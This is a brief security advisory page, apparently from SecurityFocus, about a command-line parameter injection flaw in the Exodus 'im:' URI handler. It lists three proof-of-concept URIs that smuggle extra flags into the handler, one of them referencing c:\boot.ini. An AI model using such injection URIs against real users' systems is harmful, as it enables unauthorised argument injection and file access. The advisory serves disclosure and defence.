Exodus URI Handler Command Line Parameter Injection Vulnerability

The following proofs of concept demonstrate this vulnerability:

im:///'%20-?

im:///'%20-l%20c:\boot.ini%20-v

im:///'%20-c%20file:///aaaa%20

The following example exploit is available:


 

Privacy Statement
Copyright 2010, SecurityFocus